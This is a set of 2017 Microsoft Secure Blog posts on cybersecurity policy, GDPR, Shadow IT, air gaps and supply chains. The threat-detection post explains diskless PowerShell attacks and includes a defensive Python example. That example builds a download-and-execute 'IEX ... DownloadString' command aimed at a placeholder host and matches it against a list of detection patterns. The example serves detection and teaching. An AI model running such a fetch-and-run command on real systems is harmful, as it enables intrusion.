Microsoft Secure Blog
In-depth discussion of security, cybersecurity and technology trends affecting trust in computing, as well as timely security news, trends, and practical security guidance.

7 types of highly effective hackers (and what to do about them)
By Microsoft Secure Blog Staff, May 22, 2017

Would you know what to do if you drew the attention of a hacktivist group? Knowing that damages from a hacktivist attack are typically minor is no relief, as a breach will surely damage your reputation. However, knowing about the different types of hackers, what motivates them, and the tools and techniques they use can help your organization better prepare to protect against them.

Attacks on organizations around the world are on the rise. Millions of dollars of intellectual property are at risk, along with lost productivity. Threats now come from a wide range of sources, including:

  • Script Kiddies who exploit existing code to hack for fun
  • Hacking Groups that work together to attack governments and companies
  • Hacktivists who use hacking skills to promote an agenda
  • Black Hat Professionals who make a living from hacking
  • Organized Criminal Gangs that steal data to make money
  • Nation States that conduct political and economic espionage
  • Cyberweapons Dealers who sell exploits to other hackers

Learn more about these seven types of hackers, and get recommendations on how to better prepare your organization against their potential threats, in this free eBook: 7 Types of Highly Effective Hackers.

More than just an ocean separates American and European approaches to cybersecurity
By Paul Nicholas, May 17, 2017

The recent revision of the National Institute of Standards and Technology's (NIST) Cybersecurity Framework and the publication of the European Network and Information Security Agency's (ENISA) proposals on implementation of the Network and Information Security (NIS) Directive have made me pause and ponder the progress made (or indeed not) in securing our critical infrastructures since they were both introduced. I was also struck by how much differences in political culture affect policy outcomes, even when these are largely supported by the broad ecosystems they seek to regulate and/or influence.

The starting point was strikingly similar for both economic powers: the Directive and the Framework each seek to improve the cybersecurity of critical infrastructures. Both emerged at around the same time in early 2013, when the European Commission first introduced the Directive and President Obama signed the Executive Order that set out the process that ultimately resulted in the Cybersecurity Framework.

Given the considerable differences between the US and EU political, legislative and executive “machines,” it is no surprise that, even with this common starting point, the two have followed very different paths. The Framework is undergoing its first major revision in three years, based on changes in the threat landscape and the experiences of global adopters. The Directive, by contrast, is only now beginning its implementation phase in EU member states.

NIST's creation of the Framework has been rightly held up as a successful example of public-private partnership. NIST used an open, collaborative and iterative development process to harness the expertise and experience of cyber and non-cyber stakeholders, hosting numerous open workshops and consulting widely, and not just within the US itself. The result is a Framework that is now referenced around the world by businesses and governments, and that is being considered as a starting point for ISO 27103.

On the other hand, the processes of aligning 28 different sets of national cybersecurity agendas, and of securing a common view from a European Parliament that has somewhere between four and six major party groups, took considerably longer than the gestation of the Framework. It was a monumental effort and investment on the part of Europe. There were working groups and workshops too, but perhaps because of the effort required to coordinate agreement at the “top,” the resulting Directive lacks some of the obvious “bottom-up” characteristics of the Framework. The Directive has its own benefits, however: it creates durable institutions in EU member states, coordination processes, and security baselines. As a result, it is likely to deliver a very different return on investment than the Framework.

But this should not just be a story of different approaches to cybersecurity policy. The EU approach of building institutions and setting capability requirements, if implemented and allowed to evolve, will help provide a layer of coordination and security that did not previously exist. The Framework's voluntary nature and global adoption, meanwhile, make it better at preparing enterprises, public and private, to improve their risk management measures.

These are substantial differences from the perspective of both businesses and regulators. In the end, however, the two approaches may complement each other more than we see today. For example, several EU member states already reference the Framework within their approaches to cybersecurity, drawing on its terminology and standards as they implement the Directive. Looking forward, therefore, it is possible that the two approaches could converge in practical ways. Parts of the Framework might evolve into an international standard, as referenced above, one that could be utilized by a great number of countries. Equally, the implementation of the Directive at EU member state level, and the identification of reference standards, could establish a model that other regions might follow.

Serious divergence in approaches to cybersecurity, wherever in the world it occurs, will inevitably encourage and enable cybercriminals and cyberattacks. As such, it seems essential that steps are taken on both sides of the Atlantic to ensure closer harmonization, both to improve the position of the US and the EU and to set an example for the rest of the world.

How the Asia-Pacific region is advancing cybersecurity
By Microsoft Secure Blog Staff, May 15, 2017

This post is authored by Angela McKay, Director of Cybersecurity Policy.

Earlier this year, my team and I had the great privilege and pleasure of spending several days in Japan, participating in the Information Technology Promotion Agency (IPA) Symposium. We also met with industry colleagues to discuss global cybersecurity trends and opportunities to engage in public policy, and met with Japanese government partners to examine the question of cloud security.

Even a few days in Tokyo demonstrated that the focus on cybersecurity is growing in Japan and across the Asia-Pacific region, within both government and industry, as is the understanding that concrete action is now needed.

Japan is well positioned for regional leadership in this space. The size of the IPA symposium, the seniority of both attendees and speakers, and the maturity of the conversation underscored this. In Japan, cybersecurity is clearly evolving from an issue of interest solely to technically inclined geeks to one that is a major concern for the government, businesses, and consumers. The policy debate is shifting from conceptual discussions to more practical considerations, such as the development of security practices and requirements, particularly for critical infrastructure and government.

What is particularly praiseworthy and unique in the Japanese approach is the iterative way the government tackles challenges in this space, dynamically reprioritizing and emphasizing different areas based on changes in technology and risk, and on the effectiveness of its various efforts. For example, while the Basic Cybersecurity Law and National Cybersecurity Strategy were adopted more than two years ago, the government has since repeatedly consulted on and reexamined areas where outcomes have proven difficult to attain, such as cross-government cooperation on cybersecurity.

Japan is not alone in grappling with how to govern cybersecurity; however, it is one of the few governments that understands cybersecurity is not an area that can be addressed once and then ignored for the next decade. It is using the impetus of the 2020 Olympics and Paralympics to increase cyber resilience, examining how new technologies, such as cloud computing, can improve security for government, critical infrastructure, and the Internet of Things (IoT). It actively assesses progress with 2020 in mind, for example by considering whether and how cybersecurity information sharing is improving the security of the Games and of key sectors of the economy. It does this not just by forming ISACs but by partnering with the private sector to ensure that 1) sharing is focused on risk management outcomes, and 2) cultural and structural obstacles that may be particular to Japan are understood and addressed.

A similar approach is being pursued in encouraging critical infrastructure sectors to adopt risk management practices. The government has been consulting on its guidance, recognizing that while the voluntary nature of its cybersecurity efforts remains pivotal, many private sector enterprises are looking for more specific direction on how to move forward in this area. In our response, Microsoft suggested developing a model similar to the one put forward by NIST with its Cybersecurity Framework, in which government and the private sector collaborate to develop guidance that builds on proven standards and best practices within an overarching framework that is meaningful to executives.

Beyond this pragmatic approach, Japan also continues to drive thought leadership in important new areas. It recently announced a partnership with Germany to establish an Internet of Things (IoT) standard for commercial and industrial organizations, along with proposals on how best to secure this new area of innovation. This gives Japan a unique opportunity, perhaps even a responsibility as a genuine world leader in this space, to start articulating the security concerns that players in IoT services should address (our NTIA response offers more detail on these concerns). Japan's solutions, including the use of incentives to drive behaviors, will be watched by other governments, not just regionally but across the globe.

In the era of digitalization, every government and organization should look to effective initiatives and programs, such as Japan's, and incorporate them into their own policies and operations. Microsoft is excited to work alongside Japan and other Asia-Pacific countries to build a global culture of strong cybersecurity principles that create a trustworthy high-tech world. It will take the leadership of countries such as Japan, and the commitment of industry leaders such as ourselves, to ensure safety and security in the digital space.

Use Enterprise Threat Detection to find “invisible” cyberattacks
By Microsoft Secure Blog Staff, May 10, 2017

This post is authored by Roberto Bamberger, Principal Consultant, Enterprise Cybersecurity Group.

Amongst the plethora of cyberattack stories in the news, several recent articles describe attacks that are more difficult to detect because they leverage legitimate tools, already present in an enterprise, to achieve their mission. SecureList calls the techniques used in these situations “invisible” and “diskless.” This post describes the challenges your organization can face in detecting such attacks with typical detection techniques, and what you can do to protect against them.

To begin, consider that many of these attacks use native Windows capabilities such as PowerShell to avoid storing files on disk, where they would be routinely scanned and could be discovered by antivirus products. That is why Microsoft has developed multiple capabilities that can detect such attacks, including:

  1. Microsoft Enterprise Threat Detection
  2. Windows Defender Advanced Threat Protection
  3. Microsoft Advanced Threat Analytics

Here is a summary of how each of these can help you.

The Microsoft Enterprise Threat Detection (ETD) service is a managed detection service that can detect invisible/diskless attacks and provide enterprises with actionable intelligence to respond effectively to these threats. Windows 10 also includes Windows Defender Advanced Threat Protection (Windows Defender ATP). This feature, along with the Antimalware Scan Interface (AMSI) and Microsoft Advanced Threat Analytics (ATA), provides user and entity behavioral analysis capabilities that can be effective in detecting such threats and their associated malicious behaviors.

Enterprise Threat Detection can consume a variety of data sources:

  • Windows error reports, which can contain the memory of a faulting process, registry keys, files, and the results of WMI queries
  • Telemetry sent from the organization’s IP egress ranges through the Microsoft Active Protection Service (MAPS)
  • Data received by the Microsoft Digital Crimes Unit as part of its botnet disruption and eradication efforts
  • Signals from ATA and Windows Defender ATP on Windows 10, which provide advanced detection and response data

To illustrate how Windows Error Reporting data can be leveraged for this type of advanced analysis, consider an event the Microsoft ETD team recently received from a customer environment, caused by a crash in PowerShell.

In this case, PowerShell was executing an object stored in a base64-encoded string. Automated analysis of the memory of the PowerShell process indicated that it contained code consistent with malicious shellcode.

Further analysis revealed that the code was being reflectively loaded into the PowerShell process and attempted to download additional code from an external source. Using advanced analysis tools, ETD analysts determined the name of the server and the file being requested.
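To make this kind of artifact more concrete, here is a minimal Python sketch, not the ETD tooling itself, that decodes a base64-encoded PowerShell command line (PowerShell's -EncodedCommand switch expects base64 over a UTF-16LE string) and flags strings commonly associated with download-and-execute or in-memory loading behavior. The encoded command and the indicator list are hypothetical examples.

```python
import base64
import re

# Hypothetical encoded command, standing in for one recovered from an error report or event log.
# PowerShell's -EncodedCommand value is base64 of a UTF-16LE string.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/payload')".encode("utf-16-le")
).decode("ascii")

# Strings that often indicate download-and-execute or reflective loading behavior (illustrative only).
SUSPICIOUS_PATTERNS = [
    r"DownloadString", r"DownloadFile", r"Net\.WebClient",
    r"Invoke-Expression", r"\bIEX\b", r"Reflection\.Assembly",
    r"FromBase64String", r"VirtualAlloc",
]

def decode_powershell_command(encoded):
    """Decode a PowerShell -EncodedCommand value (base64 over UTF-16LE)."""
    return base64.b64decode(encoded).decode("utf-16-le", errors="replace")

def find_indicators(command):
    """Return the suspicious patterns present in the decoded command."""
    return [p for p in SUSPICIOUS_PATTERNS if re.search(p, command, re.IGNORECASE)]

if __name__ == "__main__":
    decoded = decode_powershell_command(ENCODED)
    print("Decoded command:", decoded)
    print("Indicators found:", find_indicators(decoded) or "none")
```

A real investigation layers this kind of pattern matching with memory and behavioral analysis, as described above; simple string matching alone is easy for attackers to evade.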

Analysis of the payload returned from this internet resource revealed that the attacker was establishing a reverse shell and loading the Metasploit Meterpreter, a popular penetration testing tool. However, the Meterpreter code was never written to disk as a file; it was diskless, loaded only from an external site, which made detection within the customer environment difficult.

Microsoft ETD analysts quickly analyzed the event, determined it was malicious, and informed the organization of the nature of the attack, providing it with actionable intelligence. This intelligence included indicators of attack that could be used to analyze additional data, such as proxy logs, to determine whether the activity was still ongoing and/or impacting other machines in the environment.
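As a rough illustration of how such indicators of attack might be applied to proxy logs, the Python sketch below counts log entries whose destination matches a known-bad host or path. The CSV layout, column names and indicator values are invented for the example; real proxy log formats and indicator feeds vary.

```python
import csv
from collections import Counter

# Hypothetical indicators of attack supplied by an analyst (host and path are made up).
IOC_DOMAINS = {"malicious-host.example", "c2.example.net"}
IOC_PATHS = {"/stage2.bin"}

def scan_proxy_log(path):
    """Count matches per client from a CSV proxy log with 'client_ip', 'dest_host' and 'uri_path' columns."""
    hits = Counter()
    with open(path, newline="") as handle:
        for row in csv.DictReader(handle):
            if row["dest_host"] in IOC_DOMAINS or row["uri_path"] in IOC_PATHS:
                hits[row["client_ip"]] += 1
    return hits

if __name__ == "__main__":
    for client, count in scan_proxy_log("proxy.csv").most_common():
        print(f"{client}: {count} connection(s) to known indicators")
```

Machines that surface here would be candidates for deeper investigation, for example with Windows Defender ATP or ATA.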

In conclusion, organizations need to be aware that this type of malicious behavior is becoming more prevalent in cybercrime. Microsoft offers many insights and tools to help enterprises keep their environments protected. For information about Enterprise Threat Detection services, contact your Microsoft account team or email mtds@microsoft.com.

How the GDPR is driving CISOs’ agendas
By Microsoft Secure Blog Staff, May 9, 2017

This post is authored by Daniel Grabski, Executive Security Advisor, Enterprise Cybersecurity Group.

As an Executive Security Advisor for the Central and Eastern European region, I engage every day with Chief Information Security Officers (CISOs) to learn their thoughts and concerns. One very hot topic, raised at nearly every meeting, conference or seminar I attend with customers and partners, is the General Data Protection Regulation, or GDPR. In essence, the GDPR is fundamentally about protecting and enabling the privacy rights of individuals. It establishes strict global privacy requirements governing how you manage and protect personal data while respecting individual choice, no matter where data is sent, processed, or stored.

Without a doubt, GDPR is one of the biggest changes coming to European Union privacy laws in recent years. It is a complex regulation that may require significant changes for every company that:

  1. Is established in the EU.
  2. Sells goods or services in the EU.
  3. Monitors and processes data of those in the EU, regardless of where that processing and monitoring takes place.

The GDPR's requirements also extend to the technology used within organizations, as well as to the relevant people and processes that must be in place to manage every stage. And even once the GDPR is enforced as of 25 May 2018, compliance will remain an ongoing process.

In this post, in order to help answer the most common questions I hear from CISOs, I will briefly address the following:

  • What does Microsoft’s journey to GDPR compliance look like?
  • What can I do today?
  • What is the role of my cloud provider?
  • How can technology help me with compliance?

What does Microsoft’s journey to GDPR compliance look like?

Microsoft wears many hats under the GDPR: we offer consumer services for which we are a controller, we offer enterprise online services for which we are a processor, and setting aside our role as a technology company, we are an international company with a global employee base. This means that we are going through the same journey as your organization and are innovating to make GDPR compliance simpler for our customers by May 2018. As stated in a recent blog post by Brendon Lynch, Chief Privacy Officer at Microsoft, “To simplify your path to compliance, Microsoft is committing to be GDPR compliant across our cloud services when enforcement begins on May 25, 2018. We have also committed to share our experience complying with complex regulations, to help you craft the best path forward for your organization to meet the privacy requirements of the GDPR.”

You can follow Microsoft's journey to GDPR compliance, and our recommendations, via our website and the Get GDPR compliant with the Microsoft Cloud blog. On the website, you will find a whitepaper that describes how Microsoft enterprise products and cloud services can help you get ready for the GDPR.

From my discussions with customers and partners, I can attest that many are keenly aware of the GDPR's requirements. However, awareness and readiness currently span a large divide: about one third have not yet begun the journey, another third are just beginning the process, and the final third are actively working to map GDPR requirements to their current processes and technology stack.

GDPR is not only the responsibility of the Chief Information Security Officer or Data Privacy Officer, but of the entire C-suite. It is not just about the application of technology; the processes involved must also be considered and aligned to the new regulation. Last, but not least, it is a topic every employee should be aware of, from the executive level to operations. It is of paramount importance to provide proper awareness and training across the company, emphasizing the importance of the GDPR, its impact on company operations, and the consequences of failing to comply with its requirements. Becoming GDPR compliant therefore requires the full alignment of people, processes and technology.

What can I do today?

We recommend you begin your journey to GDPR compliance by focusing on four key steps (see Figure 1 below):

  • Discover: identify what personal data you have and where it resides. This is fundamental to any good risk management practice, and it is critical under the GDPR, because you can only protect and manage data as the regulation requires once you have identified it.
  • Manage: execute on data subject requests and govern how personal data is used and accessed. Make sure that data is used only for the purposes it was intended for and is accessible only to those with a need to access it.
  • Protect: establish security controls to prevent, detect, and respond to vulnerabilities and data breaches. By properly securing your data across its lifecycle, you reduce the risk of a breach occurring, and knowing when and if a breach occurs helps you keep the data protection authority informed.
  • Report: report data breaches and keep the required documentation. Proving that you are governing data in the right way and successfully handling data subject requests is the core of compliance.

Figure 1: Four steps to GDPR compliance

The Beginning your GDPR Journey whitepaper provides more details on the steps and the technologies available today to help you.
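To illustrate the spirit of the Discover step only, and not as a substitute for purpose-built classification tooling such as Azure Information Protection, here is a minimal Python sketch that walks a folder of text files and counts matches for a couple of rough personal-data patterns. The patterns, folder name and file types are assumptions made for the example.

```python
import re
from pathlib import Path

# Very rough patterns for data that may be personal under the GDPR; real discovery
# tooling is far more sophisticated and covers many more data types and file formats.
PATTERNS = {
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+"),
    "phone": re.compile(r"\+?\d[\d\s().-]{7,}\d"),
}

def discover_personal_data(root):
    """Return {file path: {pattern name: match count}} for text files under 'root'."""
    inventory = {}
    for path in Path(root).rglob("*.txt"):
        text = path.read_text(errors="ignore")
        counts = {name: len(rx.findall(text)) for name, rx in PATTERNS.items()}
        if any(counts.values()):
            inventory[str(path)] = counts
    return inventory

if __name__ == "__main__":
    for file, counts in discover_personal_data("./shared_drive").items():
        print(file, counts)
```

Even a simple inventory like this makes the later Manage, Protect and Report steps more tractable, because you know where the personal data actually lives.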

What is the role of my cloud provider?

This is a common question I hear from CISOs looking across their complex environments, as they try to understand what role their cloud provider plays in addressing the requirements of the GDPR. The GDPR requires that controllers use only processors that have committed to comply with the GDPR and to support controllers' compliance efforts. Microsoft is the first major cloud service provider to make this commitment, which means Microsoft will meet the stringent security requirements of the GDPR.

Fundamentally, the GDPR is also about shared responsibility and trust. It calls for a cloud service provider, such as Microsoft, with a principled approach to privacy, security, compliance and transparency. Trust can be viewed from many angles, including how the provider secures its own, and its customers', infrastructure to manage cybersecurity risk. How is data protected? What mechanisms and principles drive the approaches and practices in this very sensitive area?

Microsoft invests $1 billion per year in protecting against, detecting and responding to security incidents, within the company and on behalf of customers and the millions of victims of cybercrime around the globe. In November 2015 we announced the Microsoft Cyber Defense Operations Center (CDOC), a facility that brings together security experts from across the company to help protect against, detect and respond to cyber threats in real time. The CDOC's dedicated teams operate 24×7, and the center has direct access to thousands of security professionals, data analysts and scientists, engineers, developers, program managers, and operations specialists throughout the Microsoft global network, ensuring rapid detection, response and resolution of security threats.

Figure 2: Cyber Defense Operations Center (CDOC)

Microsoft openly shares how we protect our own and our customers’ infrastructures. Read more about best practices used in the Cyber Defense Operations Center. The CDOC also leverages the power of the cloud through the Microsoft Intelligent Security Graph (ISG).

Every second of every day, we add hundreds of gigabytes' worth of telemetry to the Security Graph. This anonymized data comes from:

  • hundreds of global cloud services, both consumer and commercial
  • data about cyber threats faced by the more than 1 billion PCs we update via Windows Update every month
  • external data points we collect through extensive research and through partnerships with industry and law enforcement via the Microsoft Digital Crimes Unit

To give a sense of that scale, the Security Graph draws on the 300 billion monthly authentications across our consumer and enterprise services, as well as the 200 billion emails analyzed each month for malware and malicious websites.

Figure 3: Data sources feeding the Microsoft Intelligent Security Graph

Imagine all of this data coming together in one place, and think of how the insight it provides can help anticipate and defeat attacks, protecting your organization. As you can see in Figure 3, we analyze feedback, malware, spam, authentications, and attacks. For example, data from millions of Xbox Live devices shows how they are being attacked, and we learn how to apply that knowledge to better protect our customers. Much of this is incorporated through machine learning and analysis by data scientists to better understand the newest cyberattack techniques.

In addition to the CDOC, the Digital Crimes Unit and the Intelligent Security Graph, Microsoft has also created a dedicated team of enterprise cybersecurity professionals to help you move securely to the cloud and protect your data. These are just a few examples of the continuous investments Microsoft makes in cybersecurity, investments that are crucial to creating products and services that support your compliance with the GDPR.

How can technology help me with compliance?

Fortunately, there are many technology solutions to help with GDPR compliance. Two of my favorites are Microsoft Azure Information Protection (AIP) and Advanced Threat Protection (ATP) in Exchange Online. AIP ensures your data is identifiable and secure, a key requirement of the GDPR, regardless of where it is stored or how it is shared. With AIP you can get to work immediately on steps 1 and 2 above: classify, label and protect new or existing data; share it securely with people inside or outside your organization; track usage; and even revoke access remotely. It is an intuitive, easy-to-use and powerful solution that also includes rich logging and reporting to monitor the distribution of data, and options to manage and control your encryption keys.

When you are ready for step 3 in your GDPR compliance journey, Advanced Threat Protection addresses the GDPR's core requirement to protect the personal data of individuals against security threats. Office 365 includes features that safeguard data and help identify when a data breach occurs. One such feature is ATP in Exchange Online Protection, which helps protect email against new, sophisticated malware attacks in real time. ATP also lets you create policies that prevent users from accessing malicious email attachments or malicious websites linked through emails. For example, the Safe Attachments feature can prevent malicious attachments from impacting your messaging environment, even when their signatures are not known. Suspicious content goes through real-time behavioral malware analysis that uses machine learning techniques to evaluate it for suspicious activity, and unsafe attachments are sandboxed in a detonation chamber before messages are delivered to recipients.

In conclusion

A recent issue of The Economist examined how to manage the computer security threat, and its top recommendation was that government and product regulation must lead the way. Without a doubt, the GDPR needs to be addressed as a top priority on every CISO's agenda, now and beyond May 2018; it represents a continuous commitment to security and privacy. By becoming more regulated through the GDPR, which provides a framework to better protect personal data and tools to implement security controls for protecting against, detecting and responding to threats, we put up our best fight against cybercrime. Microsoft stands ready to work with CISOs to raise awareness, empower them, and ensure access to the resources available now and in the future.

Learn more about the GDPR and Microsoft security with these helpful resources:


About the author:
Daniel Grabski is a 20-year veteran of the IT industry, currently serving as an Executive Security Advisor for the Europe, Middle East and Africa region in the Enterprise Cybersecurity Group at Microsoft. In this role, he focuses on enterprises, partners, public sector customers and critical security stakeholders. Daniel delivers strategic security expertise and advice on the cybersecurity solutions and services needed to build and maintain secure and resilient ICT infrastructure.

It’s time for a new perspective on Shadow IT
By Microsoft Secure Blog Staff, May 8, 2017

Over 80 percent of employees admit to using non-approved SaaS applications in their jobs, and for the most part they have well-intentioned reasons for adopting them. Many report wanting to use software they are already familiar with, or that is cheaper, quicker to deploy, and better suited to their needs than the IT-approved equivalent. This isn't just about personal preference: it allows employees to skip the learning curve of new software and enables the business to move more quickly.

Empowering employees to find creative solutions to business problems, and enabling easy access to the tools they need, are key to driving innovation and productivity.

Flexibility to use preferred tools can also help attract the next generation of talent. Younger workers have grown up using the apps and devices they want to get things done in the way that works for them. Nearly 50% prefer tools like chat and messaging, and they are twice as likely as boomers to prefer meeting online rather than in person. While the urge to block Shadow IT is understandable, it may signal to new employees that your company culture isn't open to the new and innovative solutions that often characterize successful businesses.

IT should look for solutions that give employees the freedom to choose the apps they want, while still ensuring the security and compliance your organization demands. One of those solutions is to use a Cloud Access Security Broker.

Empower your workforce with a Cloud Access Security Broker (CASB)

CASB solutions give you a detailed picture of the cloud apps your employees use and help you to monitor and manage them effectively.

A good CASB solution discovers which cloud apps are in use and brings them into a single management interface. Each app is then rated for risk based on industry standards and best practices, so you can easily review apps and set policies for how users interact with each one. A good CASB solution can also help protect those apps from advanced security threats.
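As a simplified illustration of the discovery idea, rather than a depiction of how any particular CASB product works, the Python sketch below tallies requests to known cloud-app domains from a CSV proxy log and reports each app with an assumed risk rating. The app catalog, ratings and log format are all invented for the example.

```python
import csv
from collections import Counter

# Hypothetical catalog mapping cloud-app domains to names and risk ratings.
# A real CASB maintains a much larger, curated catalog scored against industry standards.
APP_CATALOG = {
    "dropbox.com": ("Dropbox", "medium"),
    "wetransfer.com": ("WeTransfer", "high"),
    "box.com": ("Box", "low"),
}

def discover_cloud_apps(log_path):
    """Count requests per known cloud app from a CSV proxy log with a 'dest_host' column."""
    usage = Counter()
    risks = {}
    with open(log_path, newline="") as handle:
        for row in csv.DictReader(handle):
            host = row["dest_host"].lower()
            for domain, (app, risk) in APP_CATALOG.items():
                if host == domain or host.endswith("." + domain):
                    usage[app] += 1
                    risks[app] = risk
    return usage, risks

if __name__ == "__main__":
    usage, risks = discover_cloud_apps("proxy.csv")
    for app, count in usage.most_common():
        print(f"{app}: {count} requests (risk: {risks[app]})")
```

The output is a starting point for policy decisions: sanction the low-risk apps your teams rely on, and steer users away from the high-risk ones.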

With better visibility, control, and protection for your Shadow IT, you can empower greater productivity while managing your security risk. Curious to learn more? Check out our new e-book: Bring Shadow IT into the Light.

Singapore: Realizing that for the future to be smart, it needs to be secure
By Paul Nicholas, May 3, 2017

In 2005, just over a decade ago, the majority of large internet user populations, certainly as a percentage of their total national population, were still to be found in North America and Europe. In 2025, less than a decade from now, many of the largest internet user populations will be in Asia. Asia will be a fulcrum of cyberspace and it will also be, inevitably, a fulcrum of both cybercrime and cybersecurity. As such, cybersecurity policy decisions being made today in Asia will significantly shape cyberspace in 2025 and beyond. Given the interconnected nature of cyberspace, their impact will be global.

While many analysts focus on Asia's large political and economic players, such as Tokyo and Beijing, I will take a look at Singapore, whose smaller size has allowed it to be agile and power ahead in terms of online innovation. It is clear that the government has realized that technology is central to both the country's current economic success and its future prospects. Not only has it strived to make Singapore a hub for industries highly reliant on technology, such as financial services, it has also focused its investments on ensuring the country can become a true “Smart Nation”. That has meant being bold in adopting new technologies and, on occasion, facilitating experimentation, for example through the recently outlined “big data sandbox” initiative.

Moreover, Singapore has also realized that it can only be successful in this space if it can adopt technology securely. Its approach, which is to give clear guidance to key parts of the economy and to cooperate closely with the private sector to help create, refine and enact that guidance with an eye to ensuring future innovation, is a worthwhile example for other Asian governments. Its early push to ensure key industry sectors can move to the cloud securely, through the adoption of the Multi-Tier Cloud Security standard, has been followed by complementary initiatives such as the Cloud Implementation Guide developed by the Association of Banks in Singapore (ABS). Central to the success of both documents has been a close partnership with those they are intended to guide, i.e. both cloud providers and those adopting new technologies. This mirrors the positive model of public-private engagement that underpinned the successful NIST Cybersecurity Framework in the United States.

More recently, the Cyber Security Agency of Singapore (CSA) has made cybersecurity even more of a priority for the country. The Cybersecurity Strategy, launched in October 2016, aims to build a resilient and trusted cyber environment by focusing on four pillars: i) Building a Resilient Infrastructure; ii) Creating a Safe Cyberspace; iii) Developing a Vibrant Cybersecurity Ecosystem; and iv) Strengthening International Partnerships. The first outcomes can already be seen, with the revised Cybercrime Act adopted in April.

Moreover, the government has already begun consultations on its Cybersecurity Act, which we expect to be introduced by the end of the year. It will be interesting to observe whether Singapore follows the model put forward by the above-mentioned NIST Cybersecurity Framework, or takes an approach closer to that of the European Union's Network and Information Security Directive. Alternatively, it could put forward its own model. After all, frameworks for protecting critical infrastructure online are still evolving: countries are debating the benefits of regulatory versus voluntary approaches, struggling to balance information sharing and incident reporting, and managing the role of regulators in an area that cuts across typical boundaries between industry sectors.

Singapore is not, however, only looking inwards. It is making an active contribution to regional cybersecurity, having launched the ASEAN Cyber Capacity Program (ACCP). As well as capacity-building activities that develop technical skills and incident response capabilities, the ACCP will support discussion and consultancy work in areas such as the creation of national cybersecurity agencies, cybersecurity strategies, and even cybersecurity legislation. This initiative highlights an important understanding: in an interconnected world, an individual, organisation or state is only as safe in cyberspace as its weakest link.

Although I remain concerned that Singapore’s approach to network separation could create problems for government, business and citizens, what distinguishes Singapore’s approach, overall, is its determination to tackle cybersecurity without cutting off its connections to the region and the world. Perhaps for an island nation that depends upon commerce the logic of putting up barriers is particularly inimical, but it nonetheless demonstrates that it can be done: governments can build cybersecurity without harming openness and innovation. Looking at Singapore, I would hope that other governments, not just in Asia but around the world, can see that infrastructure, businesses and citizens can all be protected without the loss of the interconnectedness and opportunities of cyberspace.

Mind the air gap: Network separation’s cost, productivity and security drawbacks
By Paul Nicholas, May 1, 2017

In some of my recent discussions with policy-makers, network separation, i.e. the physical isolation of sensitive networks from the Internet, has been floated as an essential cybersecurity tool. Why? It promises the holy grail of security, i.e. 100% protection, because cyberattacks can’t cross the “air gap” to reach their target.

In my experience, however, while network separation has its place in governments' cybersecurity toolkits, it also suffers from significant drawbacks. These include the costs of implementation and maintenance; diminished productivity; and, perhaps counterintuitively, degradation of some key aspects of security. Overall, network separation is out of step with a world in which systems' interconnectivity underpins innovation driven by cloud computing and the Internet of Things (IoT). I'm going to use this blog to look a little more closely at these issues.

Network separation is an established and recognized security practice in critical sectors, e.g. classified military networks or nuclear power plants. The potential consequences of these systems being compromised are sufficiently bad to justify any downsides that network separation might introduce. However, as governments consider implementing network separation more broadly, that cost/benefit calculation must change.

Looking at costs alone, creating separate networks means increased expenditure of limited resources and reduced economies of scale. An “air gap” demands creating a whole new network with standalone servers, routers, switches, management tools, etc. That network needs to be built to deliver the foreseeable peak demand, which might only occur every now and then. This largely unused capacity is effectively wasted, whereas a non-separated network could simply use temporary cloud resources to “scale up” when needed. Costs increase further because software maintenance cannot be done by a remote centralized hub, whilst physical maintenance is more time consuming.

Network separation can also harm efficiency, productivity and usability. An “air gap” creates barriers to the outside world, access to which most government workers need in order to best serve their constituencies. Having to switch attention and move information between different devices, some separated and some not, would be time-consuming at best and confusing at worst. And many government services and systems that are meant to interact directly with citizens are likely to be slowed and made more cumbersome by separation protocols. The benefits of smart cities and smart nations will be significantly diminished if governments forsake cloud and IoT benefits in the name of network separation.

Finally, even network separation’s security benefits are not foolproof. For one thing, being disconnected from threats frequently means being disconnected from cybersecurity innovation, let alone mundane security tools such as patches. Moreover, the assumption of being safe on the other side of an “air gap” can mean staff and management take essential security basics for granted. Indeed, a poor cybersecurity culture within any organization means social engineering or human error can give malicious actors a way into a system, e.g. as employees circumvent cumbersome requirements by relying on their private (and often insecure) email.

Furthermore, the “air gap” itself can be circumvented. Just one connection with the outside world creates a single point of failure for malicious actors to exploit, and even with no direct connection there are ways “in.” As Stuxnet showed, removable media such as USB drives can insert malware into physically separated hardware, whilst some forms of hacking are able to “jump” the air gap, e.g. USBee (a “software-only method for short-range data exfiltration using electromagnetic emissions from a USB dongle”) and AirHopper (which turns a computer’s video card into an FM transmitter to collect data from “air-gapped” devices).

For governments concerned about the growing scale, frequency, sophistication and impact of cyberattacks there can be legitimate reasons for adopting network separation. In limited sets of circumstances, e.g. protecting classified networks, it can be part of an appropriate, risk-management based cybersecurity response. That being said, it is essential for governments to understand the tradeoffs in cost, usability, and effectiveness that the approach introduces. Network separation is not and cannot be the right or the only answer to all of their cybersecurity concerns.

Supply chain security demands closer attention
By Paul Nicholas, April 26, 2017

Often in dangerous situations we initially look outwards and upwards for the greatest threats. Sometimes we should instead be looking inwards and downwards. Supply chain security in information and communication technology (ICT) is exactly one of those situations where detailed introspection could be of benefit to all concerned. The smallest security breach can have disastrous implications, irrespective of whether the attackers’ entry point is within one’s own system or within that of a supplier. ATM breaches, which can expose hundreds of millions of people’s personal information, are one example of how an attack can occur via a contractor.

My experience over the last fifteen or more years of cybersecurity policy work is that in a diverse, globalized and interconnected world, supply chains can pose a major cybersecurity threat if left unmanaged. Many products are built up from elements that are created and modified by different companies in different places. This is as true of software as it is of hardware. Global supply chains create opportunities for the introduction of counterfeit elements or malicious code. The problem is not concentrated in one region and the consequences can be global.

The situation is not wholly new, nor is it wholly unknown. From Microsoft's perspective, based on our experience in the cyber supply chain risk management (C-SCRM) space and in line with our broad approach to all cybersecurity issues, the best approach to validating ICT products and components is risk-based. If I were to put forward the basic elements of a supply chain risk management stance, they would include:

  • A clear understanding of the critical supply chain risks that need to be mitigated, which will require regular evaluation and adjustment as threats or technologies change;
  • Principles and practices that take account of the lifecycle of threats whilst promoting transparency, accountability and trust between companies themselves and between companies and the authorities;
  • An understanding that flexibility is critical, given i) vendors’ differing business models and markets, and ii) that seemingly simple changes in technology can rapidly change threat models; and,
  • A holistic approach to C-SCRM that spans technical controls, operational controls, and vendor and personnel controls.

